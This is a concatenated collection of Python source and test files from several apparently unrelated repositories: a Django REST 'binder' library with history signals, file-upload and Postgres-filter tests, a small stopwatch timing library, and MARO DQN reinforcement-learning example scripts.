for field_name, new_value in instance.binder_concrete_fields_as_dict().items():
try:
old_value = instance._history[field_name]
if old_value != new_value:
history.change(sender, instance.pk, field_name, old_value, new_value)
instance._history[field_name] = new_value
except KeyError:
# Unfetched field (using only(...)), we don't know if it's
# been changed...
pass
def history_obj_post_delete(sender, instance, **kwargs):
history.change(sender, instance.pk, 'pk', instance.pk, None)
def history_obj_m2m_changed(sender, instance, action, reverse, model, pk_set, **kwargs):
if reverse or action not in ('pre_add', 'pre_remove', 'pre_clear'):
return
# Find the corresponding field on the instance
field = [f for f in instance._meta.get_fields() if f.concrete and f.many_to_many and f.remote_field.through == sender][0]
history.change(instance.__class__, instance.id, field.name, history.DeferredM2M, history.DeferredM2M)
# FIXME: remove
def install_m2m_signal_handlers(model):
warnings.warn(DeprecationWarning('install_m2m_signal_handlers() is deprecated, call install_history_signal_handlers() instead!'))
install_history_signal_handlers(model)
def install_history_signal_handlers(model):
if model is None:
return
if not model.Meta.abstract and model.Binder.history:
signals.post_init.connect(history_obj_post_init, model)
signals.post_save.connect(history_obj_post_save, model)
signals.post_delete.connect(history_obj_post_delete, model)
for field in model._meta.get_fields():
if field.many_to_many and field.concrete:
signals.m2m_changed.connect(history_obj_m2m_changed, getattr(model, field.name).through)
for sub in model.__subclasses__():
install_history_signal_handlers(sub)
class ContextAnnotation:
def __init__(self, func):
self._func = func
def get(self, request):
return self._func(request)
class OptionalAnnotation:
def __init__(self, expr):
self._expr = expr
def get(self, request):
if isinstance(self._expr, ContextAnnotation):
return self._expr.get(request)
else:
return self._expr
--- FILE SEPARATOR ---
import json
from os import urandom
from PIL import Image
from tempfile import NamedTemporaryFile
from django.test import TestCase, Client
import mimetypes
from binder.json import jsonloads
from django.core.files import File
from django.contrib.auth.models import User
from .testapp.models import Animal, Zoo
def image(width, height):
return Image.frombytes('RGB', (width, height), urandom(width * height * 3))
IMG_SUFFIX = {
'jpeg': '.jpg',
'png': '.png',
}
def temp_imagefile(width, height, format):
i = image(width, height)
f = NamedTemporaryFile(suffix=IMG_SUFFIX[format])
i.save(f, format)
f.seek(0)
return f
class FileUploadTest(TestCase):
def setUp(self):
super().setUp()
u = User(username='testuser', is_active=True, is_superuser=True)
u.set_password('test')
u.save()
self.client = Client()
r = self.client.login(username='testuser', password='test')
self.assertTrue(r)
# Clean up uploaded files
def tearDown(self):
Zoo.objects.all().delete()
def test_get_model_with_file(self):
emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
with temp_imagefile(100, 200, 'jpeg') as file:
emmen.floor_plan.save('plan.jpg', File(file), save=False)
emmen.save()
response = self.client.get('/zoo/%d/' % emmen.id)
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(emmen.id, result['data']['id'])
self.assertEqual(emmen.name, result['data']['name'], 'Wildlands Adventure Zoo Emmen')
self.assertEqual('/zoo/%d/floor_plan/' % emmen.id, result['data']['floor_plan'])
# This is a basic regression test for a bug due to the router
# singleton refactor, GET would crash if the model simply
# _contained_ a file attribute.
def test_get_related_model_with_file(self):
emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
with temp_imagefile(100, 200, 'jpeg') as file:
emmen.floor_plan.save('plan.jpg', File(file), save=False)
emmen.save()
donald = Animal(name='Donald Duck', zoo=emmen)
donald.save()
response = self.client.get('/animal/%d/' % donald.id, data={'with': 'zoo'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(donald.id, result['data']['id'])
self.assertEqual({'zoo': 'zoo'}, result['with_mapping'])
self.assertEqual({'zoo': 'animals'}, result['with_related_name_mapping'])
zoo = result['with']['zoo'][0]
self.assertEqual(emmen.id, zoo['id'])
self.assertEqual(emmen.name, zoo['name'], 'Wildlands Adventure Zoo Emmen')
self.assertEqual('/zoo/%d/floor_plan/' % emmen.id, zoo['floor_plan'])
# Same as above, but in multi-put's code path
def test_multi_put_model_with_existing_file(self):
emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
with temp_imagefile(100, 200, 'jpeg') as file:
emmen.floor_plan.save('plan.jpg', File(file), save=False)
emmen.save()
model_data = {
'data': [{
'id': emmen.id,
'name': 'Wildlands!',
}]
}
response = self.client.put('/zoo/', data=json.dumps(model_data), content_type='application/json')
self.assertEqual(response.status_code, 200)
def test_upload_to_file_field_stores_file(self):
emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
emmen.save()
with temp_imagefile(100, 200, 'jpeg') as uploaded_file:
response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': uploaded_file})
self.assertEqual(response.status_code, 200)
emmen.refresh_from_db()
uploaded_file.seek(0)
self.assertTrue(emmen.floor_plan)
with emmen.floor_plan.file as current_file:
self.assertEqual(uploaded_file.read(), current_file.read())
# overwrite with new one
with temp_imagefile(10, 20, 'jpeg') as replacement_file:
response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': replacement_file})
self.assertEqual(response.status_code, 200)
emmen.refresh_from_db()
replacement_file.seek(0)
self.assertTrue(emmen.floor_plan)
with emmen.floor_plan.file as current_file:
self.assertEqual(replacement_file.read(), current_file.read())
def test_upload_triggers_file_field_validation_errors(self):
emmen = Zoo(name='Nowhere')
emmen.save()
with temp_imagefile(100, 200, 'jpeg') as uploaded_file:
response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': uploaded_file})
self.assertEqual(response.status_code, 400)
returned_data = jsonloads(response.content)
self.assertEqual(len(returned_data['errors']), 1)
self.assertEqual(len(returned_data['errors']['zoo']), 1)
self.assertSetEqual(set(['floor_plan', 'name']), set(returned_data['errors']['zoo'][str(emmen.id)].keys()))
self.assertEqual('no plan', returned_data['errors']['zoo'][str(emmen.id)]['floor_plan'][0]['code'])
self.assertEqual('nowhere', returned_data['errors']['zoo'][str(emmen.id)]['name'][0]['code'])
emmen.refresh_from_db()
self.assertFalse(emmen.floor_plan)
def test_upload_size_resized_png(self):
emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
emmen.save()
with temp_imagefile(600, 600, 'png') as uploaded_file:
response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': uploaded_file})
self.assertEqual(response.status_code, 200)
emmen.refresh_from_db()
content_type = mimetypes.guess_type(emmen.floor_plan.path)[0]
self.assertEqual(content_type, 'image/jpeg')
self.assertEqual(emmen.floor_plan.width, 500)
self.assertEqual(emmen.floor_plan.height, 500)
def test_upload_size_resized_jpeg(self):
emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
emmen.save()
with temp_imagefile(600, 600, 'jpeg') as uploaded_file:
response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': uploaded_file})
self.assertEqual(response.status_code, 200)
emmen.refresh_from_db()
content_type = mimetypes.guess_type(emmen.floor_plan.path)[0]
self.assertEqual(content_type, 'image/jpeg')
self.assertEqual(emmen.floor_plan.width, 500)
self.assertEqual(emmen.floor_plan.height, 500)
--- FILE SEPARATOR ---
import os
import unittest
from django.test import TestCase, Client
from binder.json import jsonloads
from django.contrib.auth.models import User
if os.environ.get('BINDER_TEST_MYSQL', '0') == '0':
from .testapp.models import FeedingSchedule, Animal, Zoo
# TODO: Currently these only really test filtering. Move to test/filters?
@unittest.skipIf(
os.environ.get('BINDER_TEST_MYSQL', '0') != '0',
"Only available with PostgreSQL"
)
class PostgresFieldsTest(TestCase):
def setUp(self):
super().setUp()
u = User(username='testuser', is_active=True, is_superuser=True)
u.set_password('test')
u.save()
self.client = Client()
r = self.client.login(username='testuser', password='test')
self.assertTrue(r)
gaia = Zoo(name='GaiaZOO')
gaia.save()
coyote = Animal(name='Wile E. Coyote', zoo=gaia)
coyote.save()
roadrunner = Animal(name='Roadrunner', zoo=gaia)
roadrunner.save()
self.coyote_feeding = FeedingSchedule(animal=coyote, foods=['meat'], schedule_details={'10:30': ['meat'], '16:00': ['meat']})
self.coyote_feeding.save()
self.rr_feeding = FeedingSchedule(animal=roadrunner, foods=['corn', 'bugs'], schedule_details={'10:30': ['corn'], '16:00': ['corn', 'bugs']})
self.rr_feeding.save()
def test_get_collection_arrayfield_exact_filtering(self):
response = self.client.get('/feeding_schedule/', data={'.foods': 'corn,bugs'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.foods': 'corn'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.foods': 'corn,bugs,meat'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.foods': 'meat'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.coyote_feeding.id, result['data'][0]['id'])
def test_get_collection_jsonfield_exact_filtering(self):
response = self.client.get('/feeding_schedule/', data={'.schedule_details': '{"10:30": ["meat"], "16:00": ["meat"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.coyote_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.schedule_details': '{"10:30": ["meat"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details': '{"10:30": ["corn"], "16:00": ["corn", "bugs"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.schedule_details': '{}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def test_get_collection_arrayfield_overlap_filtering(self):
response = self.client.get('/feeding_schedule/', data={'.foods:overlap': 'corn'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.foods:overlap': 'corn,meat'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.foods:overlap': 'corn,bricks'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.foods:overlap': ''})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def test_get_collection_arrayfield_contains_filtering(self):
response = self.client.get('/feeding_schedule/', data={'.foods:contains': 'corn,bugs'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.foods:contains': 'corn,meat'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.foods:contains': 'corn'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.foods:contains': ''})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
def test_get_collection_jsonfield_contains_filtering(self):
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{"10:30": ["meat"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.coyote_feeding.id, result['data'][0]['id'])
# Embedded commas should not produce issues
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{"10:30": ["corn"], "16:00": ["corn", "bugs"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{"10:30": ["meat"], "16:00": ["corn", "bugs"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
def test_get_collection_jsonfield_invalid_json_filtering_fails(self):
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{'})
self.assertEqual(response.status_code, 418)
result = jsonloads(response.content)
self.assertEqual('RequestError', result['code'])
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{'})
self.assertEqual(response.status_code, 418)
result = jsonloads(response.content)
self.assertEqual('RequestError', result['code'])
def test_get_collection_arrayfield_contained_by_filtering(self):
response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': 'corn,bugs'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': 'corn,meat'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.coyote_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': 'corn'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': ''})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': 'corn,meat,bugs,whatever'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
def test_get_collection_jsonfield_contained_by_filtering(self):
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:30": ["meat"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
# Embedded commas should not produce issues
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:30": ["corn"], "16:00": ["corn", "bugs"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:30": ["meat"], "16:00": ["corn", "bugs"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:29": ["meat"], "10:30": ["corn"], "16:00": ["corn", "bugs"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
# This is a bit odd; first array is contained by the
# supplied array; in other words, we match recursively.
response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:30": ["corn", "meat"], "16:00": ["corn", "bugs"]}'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
def test_get_collection_jsonfield_has_key(self):
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_key': '10:30'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
# Embedded commas should not be parsed (see has_[any_]keys instead)
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_key': '10:30,16:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_key': '15:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_key': ''})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def test_get_collection_jsonfield_has_keys(self):
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_keys': '10:30'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
# Embedded commas should be parsed
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_keys': '10:30,16:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_keys': '15:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_keys': '10:30,15:00,16:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_keys': ''})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
def test_get_collection_jsonfield_has_any_keys(self):
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_any_keys': '10:30'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
# Embedded commas should be parsed
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_any_keys': '10:30,16:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_any_keys': '15:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_any_keys': '10:30,15:00,16:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_any_keys': ''})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
--- FILE SEPARATOR ---
import os
import datetime
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.signals import post_delete
from binder.models import BinderModel
def delete_files(sender, instance=None, **kwargs):
for field in sender._meta.fields:
if isinstance(field, models.fields.files.FileField):
try:
file = getattr(instance, field.name).path
os.unlink(file)
except (FileNotFoundError, ValueError):
pass
# From the api docs: a zoo with a name. It also has a founding date,
# which is nullable (representing "unknown").
class Zoo(BinderModel):
name = models.TextField()
founding_date = models.DateField(null=True, blank=True)
floor_plan = models.ImageField(upload_to='floor-plans', null=True, blank=True)
contacts = models.ManyToManyField('ContactPerson', blank=True, related_name='zoos')
most_popular_animals = models.ManyToManyField('Animal', blank=True, related_name='+')
opening_time = models.TimeField(default=datetime.time(9, 0, 0))
def __str__(self):
return 'zoo %d: %s' % (self.pk, self.name)
@property
def animal_count(self):
return self.animals.count()
def clean(self):
errors = {}
if self.floor_plan and self.name == 'Nowhere':
errors['floor_plan'] = ValidationError('Nowhere may not have a floor plan!', code='no plan')
errors['name'] = ValidationError('Nowhere may not have a floor plan!', code='nowhere')
if errors:
raise ValidationError(errors)
post_delete.connect(delete_files, sender=Zoo)
|
[
"/binder/models.py",
"/tests/test_file_uploads.py",
"/tests/test_postgres_fields.py",
"/tests/testapp/models/zoo.py"
] |
00mjk/lauda
|
# lauda
# Copyright 2015 Andrea Stagi
# See LICENSE for details.
"""
Lauda - A very simple python module for measuring time
"""
from .stopwatch import StopWatch, StopWatchException
from .decorators import stopwatch
from .contextmanager import stopwatch as stopwatchcm
__version__ = '1.2.0'
__author__ = 'Andrea Stagi'
__license__ = 'MIT'
__all__ = ['StopWatch', 'StopWatchException', 'stopwatch', 'stopwatchcm']
--- FILE SEPARATOR ---
from contextlib import contextmanager
from .stopwatch import StopWatch
@contextmanager
def stopwatch(callback=None):
watch = StopWatch()
watch.start()
yield
elapsed = watch.stop()
if callback:
callback(watch)
else:
print('Executed in {0} seconds'.format(elapsed))
--- FILE SEPARATOR ---
import unittest
import time
from mock import Mock, patch
from lauda import StopWatch, stopwatch, stopwatchcm
class TestContextManager(unittest.TestCase):
@patch('lauda.StopWatch.stop')
@patch('lauda.StopWatch.start')
def test_stopwatch(self, mock_stopwatch_start, mock_stopwatch_stop):
with stopwatchcm():
time.sleep(0.1)
mock_stopwatch_start.assert_called_with()
mock_stopwatch_stop.assert_called_with()
@patch('lauda.StopWatch.stop')
@patch('lauda.StopWatch.start')
def test_stopwatch_callback(self, mock_stopwatch_start, mock_stopwatch_stop):
my_callback = Mock(return_value=None)
with stopwatchcm(callback=my_callback):
time.sleep(0.1)
self.assertFalse(my_callback.called)
self.assertTrue(my_callback.called)
callback_args = my_callback.call_args
self.assertTrue(isinstance(callback_args[0][0], StopWatch))
self.assertTrue(len(callback_args[0]) == 1)
mock_stopwatch_start.assert_called_with()
mock_stopwatch_stop.assert_called_with()
--- FILE SEPARATOR ---
import unittest
from lauda import StopWatch, StopWatchException
class TestStopwatch(unittest.TestCase):
def test_stopwatch(self):
stopwatch = StopWatch()
start_time = stopwatch.start()
self.assertTrue(start_time > 0)
elapsed_time = stopwatch.stop()
self.assertTrue(elapsed_time > 0)
self.assertEqual(elapsed_time, stopwatch.elapsed_time)
self.assertEqual(
elapsed_time,
stopwatch.stop_time - stopwatch.start_time
)
def test_stopwatch_checkpoint(self):
stopwatch = StopWatch()
start_time = stopwatch.start()
checkpoint_1 = stopwatch.checkpoint()
checkpoint_2 = stopwatch.checkpoint()
elapsed_time = stopwatch.stop()
self.assertTrue(checkpoint_1 + checkpoint_2 <= elapsed_time)
def test_stopwatch_exceptions(self):
stopwatch = StopWatch()
self.assertRaises(StopWatchException, stopwatch.stop)
def test_elapsed_time(self):
stopwatch = StopWatch()
start_time = stopwatch.start()
elapsed_time_ongoing = stopwatch.elapsed_time
elapsed_time_final = stopwatch.stop()
self.assertTrue(elapsed_time_ongoing > 0)
self.assertTrue(elapsed_time_ongoing < elapsed_time_final)
def test_elapsed_time_zero(self):
stopwatch = StopWatch()
elapsed_time_ongoing = stopwatch.elapsed_time
self.assertEqual(elapsed_time_ongoing, 0)
self.assertRaises(StopWatchException, stopwatch.checkpoint)
|
[
"/lauda/__init__.py",
"/lauda/contextmanager.py",
"/tests/test_contextmanager.py",
"/tests/test_stopwatch.py"
] |
00mjk/maro
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .action_shaper import CIMActionShaper
from .agent_manager import DQNAgentManager, create_dqn_agents
from .experience_shaper import TruncatedExperienceShaper
from .state_shaper import CIMStateShaper
__all__ = [
"CIMActionShaper",
"DQNAgentManager", "create_dqn_agents",
"TruncatedExperienceShaper",
"CIMStateShaper"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import pickle
import numpy as np
from maro.rl import AbsAgent, ColumnBasedStore
class DQNAgent(AbsAgent):
"""Implementation of AbsAgent for the DQN algorithm.
Args:
name (str): Agent's name.
algorithm (AbsAlgorithm): A concrete algorithm instance that inherits from AbstractAlgorithm.
experience_pool (AbsStore): It is used to store experiences processed by the experience shaper, which will be
used by some value-based algorithms, such as DQN.
min_experiences_to_train: minimum number of experiences required for training.
num_batches: number of batches to train the DQN model on per call to ``train``.
batch_size: mini-batch size.
"""
def __init__(
self,
name: str,
algorithm,
experience_pool: ColumnBasedStore,
min_experiences_to_train,
num_batches,
batch_size
):
super().__init__(name, algorithm, experience_pool=experience_pool)
self._min_experiences_to_train = min_experiences_to_train
self._num_batches = num_batches
self._batch_size = batch_size
def train(self):
"""Implementation of the training loop for DQN.
Experiences are sampled using their TD errors as weights. After training, the new TD errors are updated
in the experience pool.
"""
if len(self._experience_pool) < self._min_experiences_to_train:
return
for _ in range(self._num_batches):
indexes, sample = self._experience_pool.sample_by_key("loss", self._batch_size)
state = np.asarray(sample["state"])
action = np.asarray(sample["action"])
reward = np.asarray(sample["reward"])
next_state = np.asarray(sample["next_state"])
loss = self._algorithm.train(state, action, reward, next_state)
self._experience_pool.update(indexes, {"loss": loss})
def dump_experience_pool(self, dir_path: str):
"""Dump the experience pool to disk."""
os.makedirs(dir_path, exist_ok=True)
with open(os.path.join(dir_path, self._name), "wb") as fp:
pickle.dump(self._experience_pool, fp)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch.nn as nn
from torch.optim import RMSprop
from maro.rl import (
ColumnBasedStore, DQN, DQNConfig, FullyConnectedBlock, LearningModel, NNStack, OptimizerOptions,
SimpleAgentManager
)
from maro.utils import set_seeds
from .agent import DQNAgent
def create_dqn_agents(agent_id_list, config):
num_actions = config.algorithm.num_actions
set_seeds(config.seed)
agent_dict = {}
for agent_id in agent_id_list:
q_net = NNStack(
"q_value",
FullyConnectedBlock(
input_dim=config.algorithm.input_dim,
output_dim=num_actions,
activation=nn.LeakyReLU,
is_head=True,
**config.algorithm.model
)
)
learning_model = LearningModel(
q_net,
optimizer_options=OptimizerOptions(cls=RMSprop, params=config.algorithm.optimizer)
)
algorithm = DQN(
learning_model,
DQNConfig(**config.algorithm.hyper_params, loss_cls=nn.SmoothL1Loss)
)
agent_dict[agent_id] = DQNAgent(
agent_id, algorithm, ColumnBasedStore(**config.experience_pool),
**config.training_loop_parameters
)
return agent_dict
class DQNAgentManager(SimpleAgentManager):
def train(self, experiences_by_agent, performance=None):
self._assert_train_mode()
# store experiences for each agent
for agent_id, exp in experiences_by_agent.items():
exp.update({"loss": [1e8] * len(list(exp.values())[0])})
self.agent_dict[agent_id].store_experiences(exp)
for agent in self.agent_dict.values():
agent.train()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
This file is used to load the configuration and convert it into a dotted dictionary.
"""
import io
import os
import yaml
CONFIG_PATH = os.path.join(os.path.split(os.path.realpath(__file__))[0], "../config.yml")
with io.open(CONFIG_PATH, "r") as in_file:
config = yaml.safe_load(in_file)
DISTRIBUTED_CONFIG_PATH = os.path.join(os.path.split(os.path.realpath(__file__))[0], "../distributed_config.yml")
with io.open(DISTRIBUTED_CONFIG_PATH, "r") as in_file:
distributed_config = yaml.safe_load(in_file)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import numpy as np
from maro.rl import ActorWorker, AgentManagerMode, SimpleActor
from maro.simulator import Env
from maro.utils import convert_dottable
from components import CIMActionShaper, CIMStateShaper, DQNAgentManager, TruncatedExperienceShaper, create_dqn_agents
def launch(config, distributed_config):
config = convert_dottable(config)
distributed_config = convert_dottable(distributed_config)
env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
state_shaper = CIMStateShaper(**config.env.state_shaping)
action_shaper = CIMActionShaper(action_space=list(np.linspace(-1.0, 1.0, config.agents.algorithm.num_actions)))
experience_shaper = TruncatedExperienceShaper(**config.env.experience_shaping)
config["agents"]["algorithm"]["input_dim"] = state_shaper.dim
agent_manager = DQNAgentManager(
name="cim_actor",
mode=AgentManagerMode.INFERENCE,
agent_dict=create_dqn_agents(agent_id_list, config.agents),
state_shaper=state_shaper,
action_shaper=action_shaper,
experience_shaper=experience_shaper
)
proxy_params = {
"group_name": os.environ["GROUP"] if "GROUP" in os.environ else distributed_config.group,
"expected_peers": {"learner": 1},
"redis_address": (distributed_config.redis.hostname, distributed_config.redis.port),
"max_retries": 15
}
actor_worker = ActorWorker(
local_actor=SimpleActor(env=env, agent_manager=agent_manager),
proxy_params=proxy_params
)
actor_worker.launch()
if __name__ == "__main__":
from components.config import config, distributed_config
launch(config=config, distributed_config=distributed_config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from maro.rl import (
ActorProxy, AgentManagerMode, SimpleLearner, TwoPhaseLinearParameterScheduler, concat_experiences_by_agent
)
from maro.simulator import Env
from maro.utils import Logger, convert_dottable
from components import CIMStateShaper, DQNAgentManager, create_dqn_agents
def launch(config, distributed_config):
config = convert_dottable(config)
distributed_config = convert_dottable(distributed_config)
env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
config["agents"]["algorithm"]["input_dim"] = CIMStateShaper(**config.env.state_shaping).dim
agent_manager = DQNAgentManager(
name="cim_learner",
mode=AgentManagerMode.TRAIN,
agent_dict=create_dqn_agents(agent_id_list, config.agents)
)
proxy_params = {
"group_name": os.environ["GROUP"] if "GROUP" in os.environ else distributed_config.group,
"expected_peers": {
"actor": int(os.environ["NUM_ACTORS"] if "NUM_ACTORS" in os.environ else distributed_config.num_actors)
},
"redis_address": (distributed_config.redis.hostname, distributed_config.redis.port),
"max_retries": 15
}
learner = SimpleLearner(
agent_manager=agent_manager,
actor=ActorProxy(proxy_params=proxy_params, experience_collecting_func=concat_experiences_by_agent),
scheduler=TwoPhaseLinearParameterScheduler(config.main_loop.max_episode, **config.main_loop.exploration),
logger=Logger("cim_learner", auto_timestamp=False)
)
learner.learn()
learner.test()
learner.dump_models(os.path.join(os.getcwd(), "models"))
learner.exit()
if __name__ == "__main__":
from components.config import config, distributed_config
launch(config=config, distributed_config=distributed_config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import numpy as np
